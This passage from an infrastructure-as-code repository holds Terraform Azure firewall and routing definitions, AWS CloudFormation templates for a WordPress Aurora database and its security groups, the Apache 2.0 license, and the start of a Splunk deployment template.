107 | name = "allow-inbound" 108 | 109 | source_addresses = [ 110 | "*", 111 | ] 112 | 113 | destination_ports = [ 114 | "80", 115 | ] 116 | 117 | destination_addresses = [ 118 | azurerm_public_ip.azure-firewall-PublicIP.ip_address 119 | ] 120 | 121 | translated_port = 80 122 | 123 | translated_address = "172.31.0.68" 124 | 125 | protocols = [ 126 | "TCP", 127 | "UDP", 128 | ] 129 | } 130 | } 131 | 132 | # Network Rule Collection 133 | resource "azurerm_firewall_network_rule_collection" "allow-outbound-collection" { 134 | name = "allow-outbound-collection" 135 | azure_firewall_name = azurerm_firewall.azure-firewall.name 136 | resource_group_name = azurerm_resource_group.demo-rg.name 137 | priority = 100 138 | action = "Allow" 139 | 140 | rule { 141 | name = "allow-outbound-collection" 142 | 143 | source_addresses = [ 144 | "*", 145 | ] 146 | 147 | destination_ports = [ 148 | "*", 149 | ] 150 | 151 | destination_addresses = [ 152 | "*", 153 | ] 154 | 155 | protocols = [ 156 | "Any", 157 | ] 158 | } 159 | } 160 | 161 | # Application Rule Collection 162 | resource "azurerm_firewall_application_rule_collection" "application-rule-collection" { 163 | name = "application-rule-collection" 164 | azure_firewall_name = azurerm_firewall.azure-firewall.name 165 | resource_group_name = azurerm_resource_group.demo-rg.name 166 | priority = 100 167 | action = "Allow" 168 | 169 | rule { 170 | name = "application-rule-collection" 171 | 172 | source_addresses = [ 173 | "172.31.0.68", 174 | ] 175 | 176 | target_fqdns = [ 177 | "*", 178 | ] 179 | 180 | protocol { 181 | port = "80" 182 | type = "Http" 183 | } 184 | } 185 | } 186 | 187 | # Route Table Clean to FW 188 | resource "azurerm_route_table" "route-table-sanitized-firewall" { 189 | name = "route-table-sanitized-firewall" 190 | location = azurerm_resource_group.demo-rg.location 191 | resource_group_name = azurerm_resource_group.demo-rg.name 192 | disable_bgp_route_propagation = false 193 | 194 | route { 195 | name = "sanitized-firewall" 196 | address_prefix = "0.0.0.0/0" 197 | next_hop_type = "VirtualAppliance" 198 | next_hop_in_ip_address = "172.31.0.132" 199 | } 200 | 201 | tags = { 202 | environment = var.demoenv 203 | } 204 | } 205 | 206 | # Associate Subnet to route-table-sanitized-firewall 207 | resource "azurerm_subnet_route_table_association" "sanitized-subnet" { 208 | subnet_id = azurerm_subnet.sanitized-subnet.id 209 | route_table_id = azurerm_route_table.route-table-sanitized-firewall.id 210 | } 211 | 212 | # Route Table FW to Internet and to Load Balancer 213 | resource "azurerm_route_table" "route-table-internet-loadbalancer" { 214 | name = "route-table-internet-loadbalancer" 215 | location = azurerm_resource_group.demo-rg.location 216 | resource_group_name = azurerm_resource_group.demo-rg.name 217 | disable_bgp_route_propagation = false 218 | 219 | route { 220 | name = "firewall-internet" 221 | address_prefix = "0.0.0.0/0" 222 | next_hop_type = "Internet" 223 | } 224 | 225 | route { 226 | name = "firewall-loadbalancer" 227 | address_prefix = "172.31.0.64/27" 228 | next_hop_type = "VirtualAppliance" 229 | next_hop_in_ip_address = "172.31.0.100" 230 | } 231 | 232 | tags = { 233 | environment = var.demoenv 234 | } 235 | } 236 | 237 | # Associate Subnet to route-table-internet-loadbalancer 238 | resource "azurerm_subnet_route_table_association" "azure-firewall-subnet" { 239 | subnet_id = azurerm_subnet.azure-firewall-subnet.id 240 | route_table_id = azurerm_route_table.route-table-internet-loadbalancer.id 241 | } 242 | 243 | # Route Table workload to Load Balancer 244 | resource "azurerm_route_table" "route-table-workload-loadbalancer" { 245 | name = "route-table-workload-loadbalancer" 246 | location = azurerm_resource_group.demo-rg.location 247 | resource_group_name = azurerm_resource_group.demo-rg.name 248 | disable_bgp_route_propagation = false 249 | 250 | route { 251 | name = "route-table-workload-loadbalancer-1" 252 | address_prefix = "0.0.0.0/0" 253 | next_hop_type = "VirtualAppliance" 254 | next_hop_in_ip_address = "172.31.0.100" 255 | } 256 | 257 | route { 258 | name = "route-table-workload-loadbalancer-2" 259 | address_prefix = "172.31.0.128/26" 260 | next_hop_type = "VirtualAppliance" 261 | next_hop_in_ip_address = "172.31.0.100" 262 | } 263 | 264 | tags = { 265 | environment = var.demoenv 266 | } 267 | } 268 | 269 | # Associate Subnet to route-table-workload-loadbalancer 270 | resource "azurerm_subnet_route_table_association" "workload-subnet" { 271 | subnet_id = azurerm_subnet.workload-subnet.id 272 | route_table_id = azurerm_route_table.route-table-workload-loadbalancer.id 273 | } 274 | 275 | # Create Log Analytics Workspace 276 | resource "azurerm_log_analytics_workspace" "log-analytics-workspace" { 277 | name = "log-analytics-workspace" 278 | location = azurerm_resource_group.demo-rg.location 279 | resource_group_name = azurerm_resource_group.demo-rg.name 280 | sku = "PerGB2018" 281 | retention_in_days = 60 282 | } -------------------------------------------------------------------------------- /edge-deployment/templates/rdsaurora.template: -------------------------------------------------------------------------------- 1 | { 2 | "AWSTemplateFormatVersion": "2010-09-09", 3 | "Description": "WordPress RDS Aurora-MySQL Template. (qs-1ot302h6n)", 4 | "Parameters": { 5 | "Subnets": { 6 | "ConstraintDescription": "Must be list of existing subnet Ids", 7 | "Description": "At least two existing Subnets in separate Availability Zones your Virtual Private Cloud (VPC)", 8 | "Type": "List" 9 | }, 10 | "AuroraRDSSecurityGroup": { 11 | "Description": "Aurora Security Group", 12 | "Type": "AWS::EC2::SecurityGroup::Id" 13 | }, 14 | "DBAutoMinorVersionUpgrade": { 15 | "AllowedValues": [ 16 | "true", 17 | "false" 18 | ], 19 | "Default": "true", 20 | "Description": "Select true/false to setup Auto Minor Version upgrade", 21 | "Type": "String" 22 | }, 23 | "DBBackupRetentionPeriod": { 24 | "ConstraintDescription": "Database backup retention period must be between 1 and 35 days", 25 | "Default": "7", 26 | "Description": "The number of days for which automatic DB snapshots are retained", 27 | "MaxValue": "35", 28 | "MinValue": "1", 29 | "Type": "Number" 30 | }, 31 | "DBPreferredBackupWindow": { 32 | "AllowedPattern": "^(|([0-1][0-9]|2[0-3]):[0-5][0-9]-([0-1][0-9]|2[0-3]):[0-5][0-9])$", 33 | "ConstraintDescription": "Preferred backup window must be left blank or in the form of HH:MM-HH:MM", 34 | "Default": "", 35 | "Description": "(Optional) Preferred backup window", 36 | "Type": "String" 37 | }, 38 | "DBStorageEncrypted": { 39 | "AllowedValues": [ 40 | "true", 41 | "false" 42 | ], 43 | "Default": "false", 44 | "Description": "Select true/false to enable storage encryption in the database instances", 45 | "Type": "String" 46 | }, 47 | "DBInstanceClass": { 48 | "AllowedValues": [ 49 | "db.t2.small", 50 | "db.t2.medium", 51 | "db.t3.small", 52 | "db.t3.medium", 53 | "db.r3.large", 54 | "db.r3.xlarge", 55 | "db.r3.2xlarge", 56 | "db.r3.4xlarge", 57 | "db.r3.8xlarge", 58 | "db.r4.large", 59 | "db.r4.xlarge", 60 | "db.r4.2xlarge", 61 | "db.r4.4xlarge", 62 | "db.r4.8xlarge", 63 | "db.r4.16xlarge", 64 | "db.r5.large", 65 | "db.r5.xlarge", 66 | "db.r5.2xlarge", 67 | "db.r5.4xlarge", 68 | "db.r5.8xlarge", 69 | "db.r5.12xlarge", 70 | "db.r5.16xlarge", 71 | "db.r5.24xlarge" 72 | ], 73 | "ConstraintDescription": "Must select a valid database instance type.", 74 | "Default": "db.t3.medium", 75 | "Description": "The name of the compute and memory capacity class of the DB instance. Please check that the selected instance type is available in your region.", 76 | "Type": "String" 77 | }, 78 | "DBName": { 79 | "AllowedPattern": "[a-zA-Z][a-zA-Z0-9]*", 80 | "Default": "QuickstartAuroraDB", 81 | "Description": "Name of Aurora DB for WordPress Stack", 82 | "MaxLength": "64", 83 | "MinLength": "5", 84 | "Type": "String" 85 | }, 86 | "DBMasterUserPassword": { 87 | "AllowedPattern": "(?=\\S)[^@\/\"\\r\\n\\t\\f\\s]*", 88 | "ConstraintDescription": "Min 8 alphanumeric. Cannot contain white space, @, /, \"", 89 | "Description": "The database admin account password (username is 'root').", 90 | "MaxLength": "41", 91 | "MinLength": "8", 92 | "NoEcho": "True", 93 | "Type": "String" 94 | }, 95 | "DBMultiAZ": { 96 | "AllowedValues": [ 97 | "true", 98 | "false" 99 | ], 100 | "Default": "true", 101 | "Description": "Specifies if the database instance is a multiple Availability Zone deployment", 102 | "Type": "String" 103 | } 104 | }, 105 | "Conditions": { 106 | "CreateReadReplica": { 107 | "Fn::Equals": [ 108 | { 109 | "Ref": "DBMultiAZ" 110 | }, 111 | "true" 112 | ] 113 | }, 114 | "EnableStorageEncryption": { 115 | "Fn::Equals": [ 116 | { 117 | "Ref": "DBStorageEncrypted" 118 | }, 119 | "true" 120 | ] 121 | } 122 | }, 123 | "Resources": { 124 | "AuroraDBSubnetGroup": { 125 | "Type": "AWS::RDS::DBSubnetGroup", 126 | "Properties": { 127 | "DBSubnetGroupDescription": "Subnets available for the RDS Aurora DB Instance", 128 | "SubnetIds": { 129 | "Ref": "Subnets" 130 | } 131 | } 132 | }, 133 | "AuroraDBCluster": { 134 | "Type": "AWS::RDS::DBCluster", 135 | "Properties": { 136 | "StorageEncrypted": { 137 | "Fn::If": [ 138 | "EnableStorageEncryption", 139 | true, 140 | { 141 | "Ref": "AWS::NoValue" 142 | } 143 | ] 144 | }, 145 | "BackupRetentionPeriod": { 146 | "Ref": "DBBackupRetentionPeriod" 147 | }, 148 | "PreferredBackupWindow": { 149 | "Ref": "DBPreferredBackupWindow" 150 | }, 151 | "DBSubnetGroupName": { 152 | "Ref": "AuroraDBSubnetGroup" 153 | }, 154 | "Engine": "aurora-mysql", 155 | "EngineVersion": "5.7", 156 | "MasterUsername": "root", 157 | "MasterUserPassword": { 158 | "Ref": "DBMasterUserPassword" 159 | }, 160 | "VpcSecurityGroupIds": [ 161 | { 162 | "Ref": "AuroraRDSSecurityGroup" 163 | } 164 | ], 165 | "Tags": [ 166 | { 167 | "Key": "Name", 168 | "Value": "WordPress-Aurora-DB-Cluster" 169 | } 170 | ] 171 | } 172 | }, 173 | "AuroraDBPrimaryInstance": { 174 | "Type": "AWS::RDS::DBInstance", 175 | "Properties": { 176 | "Engine": "aurora-mysql", 177 | "EngineVersion": "5.7", 178 | "DBClusterIdentifier": { 179 | "Ref": "AuroraDBCluster" 180 | }, 181 | "DBInstanceClass": { 182 | "Ref": "DBInstanceClass" 183 | }, 184 | "DBSubnetGroupName": { 185 | "Ref": "AuroraDBSubnetGroup" 186 | }, 187 | "AutoMinorVersionUpgrade": { 188 | "Ref": "DBAutoMinorVersionUpgrade" 189 | }, 190 | "Tags": [ 191 | { 192 | "Key": "Name", 193 | "Value": "WordPress-Aurora-PrimaryDB" 194 | } 195 | ] 196 | } 197 | }, 198 | "AuroraDBSecondaryInstance": { 199 | "Type": "AWS::RDS::DBInstance", 200 | "Condition": "CreateReadReplica", 201 | "Properties": { 202 | "Engine": "aurora-mysql", 203 | "EngineVersion": "5.7", 204 | "DBClusterIdentifier": { 205 | "Ref": "AuroraDBCluster" 206 | }, 207 | "DBInstanceClass": { 208 | "Ref": "DBInstanceClass" 209 | }, 210 | "DBSubnetGroupName": { 211 | "Ref": "AuroraDBSubnetGroup" 212 | }, 213 | "AutoMinorVersionUpgrade": { 214 | "Ref": "DBAutoMinorVersionUpgrade" 215 | }, 216 | "Tags": [ 217 | { 218 | "Key": "Name", 219 | "Value": "WordPress-Aurora-SecondaryDB" 220 | } 221 | ] 222 | } 223 | } 224 | }, 225 | "Outputs": { 226 | "AuroraEndPoints": { 227 | "Description": "Aurora Cluster Endpoint to connect", 228 | "Value": { 229 | "Fn::Join": [ 230 | "", 231 | [ 232 | { 233 | "Fn::GetAtt": [ 234 | "AuroraDBCluster", 235 | "Endpoint.Address" 236 | ] 237 | }, 238 | ":", 239 | { 240 | "Fn::GetAtt": [ 241 | "AuroraDBCluster", 242 | "Endpoint.Port" 243 | ] 244 | }, 245 | "/", 246 | { 247 | "Ref": "DBName" 248 | } 249 | ] 250 | ] 251 | } 252 | }, 253 | "DBName": { 254 | "Description": "Aurora DBName", 255 | "Value": { 256 | "Ref": "DBName" 257 | } 258 | }, 259 | "AuroraEndPointAddress": { 260 | "Description": "Aurora Endpoint to connect", 261 | "Value": { 262 | "Fn::Join": [ 263 | "", 264 | [ 265 | { 266 | "Fn::GetAtt": [ 267 | "AuroraDBCluster", 268 | "Endpoint.Address" 269 | ] 270 | } 271 | ] 272 | ] 273 | } 274 | }, 275 | "AuroraEndPointPort": { 276 | "Description": "Aurora Endpoint to connect", 277 | "Value": { 278 | "Fn::Join": [ 279 | "", 280 | [ 281 | { 282 | "Fn::GetAtt": [ 283 | "AuroraDBCluster", 284 | "Endpoint.Port" 285 | ] 286 | } 287 | ] 288 | ] 289 | } 290 | } 291 | } 292 | } 293 | -------------------------------------------------------------------------------- /edge-deployment/templates/securitygroups.template: -------------------------------------------------------------------------------- 1 | { 2 | "AWSTemplateFormatVersion": "2010-09-09", 3 | "Description": "WordPress Security Groups template. (qs-1ot302h6s)", 4 | "Parameters": { 5 | "VPC": { 6 | "Description": "VPC-ID of your existing Virtual Private Cloud (VPC) where you want to depoy RDS", 7 | "Type": "AWS::EC2::VPC::Id" 8 | }, 9 | "VPCCIDR": { 10 | "AllowedPattern": "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\\/([0-9]|[1-2][0-9]|3[0-2]))$", 11 | "ConstraintDescription": "Must be a valid IP range in x.x.x.x/x notation", 12 | "Description": "The CIDR block for VPC", 13 | "Type": "String" 14 | }, 15 | "ALBAccessCIDR": { 16 | "AllowedPattern": "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\\/([0-9]|[1-2][0-9]|3[0-2]))$", 17 | "ConstraintDescription": "CIDR block parameter must be in the form x.x.x.x/x", 18 | "Description": "Allowed CIDR block for external web access to the Application Load Balancer", 19 | "Type": "String" 20 | }, 21 | "BastionSecurityGroupID": { 22 | "Description": "ID of the Bastion Security Group (e.g., sg-1d2c3b4a)", 23 | "Type": "AWS::EC2::SecurityGroup::Id" 24 | }, 25 | "ElastiCacheEnable":{ 26 | "Description": "Enable ElastiCache", 27 | "AllowedValues": [ 28 | "true", 29 | "false" 30 | ], 31 | "Default": "true", 32 | "Type": "String" 33 | } 34 | }, 35 | "Conditions":{ 36 | "ElastiCacheEnableCondition":{ 37 | "Fn::Equals": [ 38 | { 39 | "Ref": "ElastiCacheEnable" 40 | }, 41 | "true" 42 | ] 43 | } 44 | }, 45 | "Resources": { 46 | "AuroraRDSSecurityGroup": { 47 | "Type": "AWS::EC2::SecurityGroup", 48 | "Properties": { 49 | "GroupDescription": "Allow access to Aurora Port (AWS Quick Start)", 50 | "VpcId": { 51 | "Ref": "VPC" 52 | }, 53 | "SecurityGroupIngress": [ 54 | { 55 | "IpProtocol": "tcp", 56 | "FromPort": 3306, 57 | "ToPort": 3306, 58 | "SourceSecurityGroupId": { 59 | "Fn::GetAtt": [ 60 | "WebServerSecurityGroup", 61 | "GroupId" 62 | ] 63 | } 64 | } 65 | ] 66 | } 67 | }, 68 | "ALBSecurityGroup": { 69 | "Type": "AWS::EC2::SecurityGroup", 70 | "Properties": { 71 | "GroupDescription": "ELB Security Group (AWS Quick Start)", 72 | "VpcId": { 73 | "Ref": "VPC" 74 | }, 75 | "SecurityGroupIngress": [ 76 | { 77 | "IpProtocol": "tcp", 78 | "FromPort": 80, 79 | "ToPort": 80, 80 | "CidrIp": { "Ref": "ALBAccessCIDR" } 81 | }, 82 | { 83 | "IpProtocol": "tcp", 84 | "FromPort": 443, 85 | "ToPort": 443, 86 | "CidrIp": { "Ref": "ALBAccessCIDR" } 87 | } 88 | ], 89 | "SecurityGroupEgress": [ 90 | { 91 | "IpProtocol": "tcp", 92 | "FromPort": 80, 93 | "ToPort": 80, 94 | "CidrIp": "0.0.0.0/0" 95 | }, 96 | { 97 | "IpProtocol": "tcp", 98 | "FromPort": 443, 99 | "ToPort": 443, 100 | "CidrIp": "0.0.0.0/0" 101 | } 102 | ] 103 | } 104 | }, 105 | "WebServerSecurityGroup": { 106 | "Type": "AWS::EC2::SecurityGroup", 107 | "Properties": { 108 | "GroupDescription": "App Server Security Group (AWS Quick Start)", 109 | "VpcId": { 110 | "Ref": "VPC" 111 | }, 112 | "SecurityGroupIngress": [ 113 | { 114 | "IpProtocol": "tcp", 115 | "FromPort": 22, 116 | "ToPort": 22, 117 | "SourceSecurityGroupId": { 118 | "Ref": "BastionSecurityGroupID" 119 | } 120 | }, 121 | { 122 | "IpProtocol": "tcp", 123 | "FromPort": 443, 124 | "ToPort": 443, 125 | "SourceSecurityGroupId": { 126 | "Fn::GetAtt": [ 127 | "ALBSecurityGroup", 128 | "GroupId" 129 | ] 130 | } 131 | }, 132 | { 133 | "IpProtocol": "tcp", 134 | "FromPort": 80, 135 | "ToPort": 80, 136 | "SourceSecurityGroupId": { 137 | "Fn::GetAtt": [ 138 | "ALBSecurityGroup", 139 | "GroupId" 140 | ] 141 | } 142 | } 143 | ], 144 | "SecurityGroupEgress": [ 145 | { 146 | "IpProtocol": "tcp", 147 | "FromPort": 80, 148 | "ToPort": 80, 149 | "CidrIp": "0.0.0.0/0" 150 | }, 151 | { 152 | "IpProtocol": "tcp", 153 | "FromPort": 443, 154 | "ToPort": 443, 155 | "CidrIp": "0.0.0.0/0" 156 | } 157 | ] 158 | } 159 | }, 160 | "EFSSecurityGroup": { 161 | "Type": "AWS::EC2::SecurityGroup", 162 | "Properties": { 163 | "GroupDescription": "EFS Security Group", 164 | "VpcId": { 165 | "Ref": "VPC" 166 | }, 167 | "SecurityGroupIngress": [ 168 | { 169 | "IpProtocol": "tcp", 170 | "FromPort": 2049, 171 | "ToPort": 2049, 172 | "CidrIp": { 173 | "Ref": "VPCCIDR" 174 | } 175 | } 176 | ] 177 | } 178 | }, 179 | "ElastiCacheSecurityGroup": { 180 | "Type": "AWS::EC2::SecurityGroup", 181 | "Condition": "ElastiCacheEnableCondition", 182 | "Properties": { 183 | "GroupDescription": "Allow access to ElastiCache-Memcached Port (AWS Quick Start)", 184 | "VpcId": { 185 | "Ref": "VPC" 186 | }, 187 | "SecurityGroupIngress": [ 188 | { 189 | "IpProtocol": "tcp", 190 | "FromPort": 11211, 191 | "ToPort": 11211, 192 | "SourceSecurityGroupId": { 193 | "Fn::GetAtt": [ 194 | "WebServerSecurityGroup", 195 | "GroupId" 196 | ] 197 | } 198 | } 199 | ] 200 | } 201 | }, 202 | "SecurityGroupRuleElastiCache": { 203 | "Type": "AWS::EC2::SecurityGroupEgress", 204 | "Condition": "ElastiCacheEnableCondition", 205 | "Properties": { 206 | "IpProtocol": "tcp", 207 | "FromPort": 11211, 208 | "ToPort": 11211, 209 | "DestinationSecurityGroupId": { 210 | "Fn::GetAtt": [ 211 | "ElastiCacheSecurityGroup", 212 | "GroupId" 213 | ] 214 | }, 215 | "GroupId": { 216 | "Fn::GetAtt": [ 217 | "WebServerSecurityGroup", 218 | "GroupId" 219 | ] 220 | } 221 | } 222 | }, 223 | "SecurityGroupRuleAppDB": { 224 | "Type": "AWS::EC2::SecurityGroupEgress", 225 | "Properties": { 226 | "IpProtocol": "tcp", 227 | "FromPort": 3306, 228 | "ToPort": 3306, 229 | "DestinationSecurityGroupId": { 230 | "Fn::GetAtt": [ 231 | "AuroraRDSSecurityGroup", 232 | "GroupId" 233 | ] 234 | }, 235 | "GroupId": { 236 | "Fn::GetAtt": [ 237 | "WebServerSecurityGroup", 238 | "GroupId" 239 | ] 240 | } 241 | } 242 | }, 243 | "SecurityGroupRuleAppEFS": { 244 | "Type": "AWS::EC2::SecurityGroupEgress", 245 | "Properties": { 246 | "IpProtocol": "tcp", 247 | "FromPort": 2049, 248 | "ToPort": 2049, 249 | "DestinationSecurityGroupId": { 250 | "Fn::GetAtt": [ 251 | "EFSSecurityGroup", 252 | "GroupId" 253 | ] 254 | }, 255 | "GroupId": { 256 | "Fn::GetAtt": [ 257 | "WebServerSecurityGroup", 258 | "GroupId" 259 | ] 260 | } 261 | } 262 | } 263 | }, 264 | "Outputs": { 265 | "AuroraRDSSecurityGroup": { 266 | "Description": "Aurora Security Group", 267 | "Value": { 268 | "Ref": "AuroraRDSSecurityGroup" 269 | } 270 | }, 271 | "ALBSecurityGroup": { 272 | "Description": "ELB Security Group", 273 | "Value": { 274 | "Ref": "ALBSecurityGroup" 275 | } 276 | }, 277 | "WebServerSecurityGroup": { 278 | "Description": "Web Server Security Group", 279 | "Value": { 280 | "Ref": "WebServerSecurityGroup" 281 | } 282 | }, 283 | "EFSSecurityGroup": { 284 | "Description": "EFS Security Group", 285 | "Value": { 286 | "Ref": "EFSSecurityGroup" 287 | } 288 | }, 289 | "ElastiCacheSecurityGroup": { 290 | "Description": "ElastiCache Security Group", 291 | "Value": { 292 | "Fn::If":[ 293 | "ElastiCacheEnableCondition", 294 | {"Ref": "ElastiCacheSecurityGroup"}, 295 | "" 296 | ] 297 | } 298 | } 299 | } 300 | } 301 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright {yyyy} {name of copyright owner} 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | 203 | -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/splunk.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Parameters: 4 | # ------------------------------------------------------------# 5 | # Import Master.yaml template 6 | # ------------------------------------------------------------# 7 | AllowIP: 8 | Description: Enter the global IP of the terminal to be tested 9 | Type: String 10 | SyslogPort: 11 | Description: Port number used by Splunk Server 12 | Type: String 13 | SecurityVPCCIDR: 14 | Description: Specify the CIDR of the VPC where you want to deploy the NSVA 15 | Type: String 16 | ImageId: 17 | Description: Enter the AMI ID of the EC2 instance. 18 | Type: String 19 | SplunkPassword: 20 | Description: Password used by Splunk Server 21 | Type: String 22 | 